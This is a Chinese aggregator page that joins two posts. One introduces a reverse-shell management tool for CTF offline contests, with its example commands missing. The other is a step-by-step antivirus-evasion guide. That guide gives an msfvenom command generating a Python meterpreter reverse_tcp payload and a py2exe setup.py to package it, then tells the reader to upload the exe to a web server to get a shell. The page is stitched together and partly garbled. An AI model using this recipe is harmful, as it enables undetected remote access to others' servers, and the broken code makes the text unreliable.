[工具介绍] 反弹 shell 管理工具
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[工具介绍] 反弹 shell 管理工具相关的知识,希望对你有一定的参考价值。
参考技术A 介绍一款基于 Python 开发的 反弹 shell 管理工具 Reverse-Shell-Manager在 CTF线下赛 的时候 , 如果通过 web 或者 pwn 已经拿到了一台服务器的控制权
那么我们可以使用反弹 shell 来对该服务器进行一个长期的权限维持
一般反弹 shell 的时候我们会怎么做呢 ?
比如说这里有一个台服务器可以 RCE 了
如果要反弹的话 , 我们首先要在自己的服务器上监听一个端口 :
然后再在目标服务器上执行 :
这样就能拿到该服务器的 shell 了
但是
一旦链接断开 , 那么就要重新利用漏洞反弹一个新的 shell
这样是不是很麻烦 , 而且还会暴露漏洞是如何被利用的
如果对方抓取了流量进行分析的话 , 很快就会把漏洞补上
而且
一般线下赛很多时候需要一些自动化的脚本来运维和进行权限维持
所以写了一个小工具 , 希望能有用
大概功能就是 :
下面有一个简单的介绍视频 :
如果可以给你带来帮助的话 , 可不可以 Star 一下呐 , ヽ(✿゚▽゚)ノ
分享一个免杀的反弹shell工具(python脚本转换成exe)
有时候网站服务器上有杀毒软件,我们上传的nc.exe、lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell。
这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀。
参考链接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1
第1步:安装Python2.7和Py2exe
一定要安装32位的Python 2.7和32位的Py2exe,不管你的操作系统是多少位的都要安装32位版本。
第2步:生成Python脚本
利用msfvenom生成Python脚本:
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.34.2 lport=443 -f raw -o /tmp/mrtp.py
第3步:创建setup.py
from distutils.core import setup import py2exe setup( name = ‘Meter‘, description = ‘Python-based App‘, version = ‘1.0‘, console=[‘mrtp.py‘], options = ‘py2exe‘: ‘bundle_files‘: 1,‘packages‘:‘ctypes‘,‘includes‘: ‘base64,sys,socket,struct,time,code,platform,getpass,shutil‘,, zipfile = None, )
第4步:生成exe
将之前生成的mrtp.py和setup.py放在同一个目录,然后执行命令:
python setup.py py2exe
稍等几秒钟即可转换成功,生成的exe程序保存dist目录。
第5步:反弹shell
首先使用MSF监听端口等待回连,然后将生成的exe程序上传的网站服务器并运行该程序即可反弹shell。
以上是关于[工具介绍] 反弹 shell 管理工具的主要内容,如果未能解决你的问题,请参考以下文章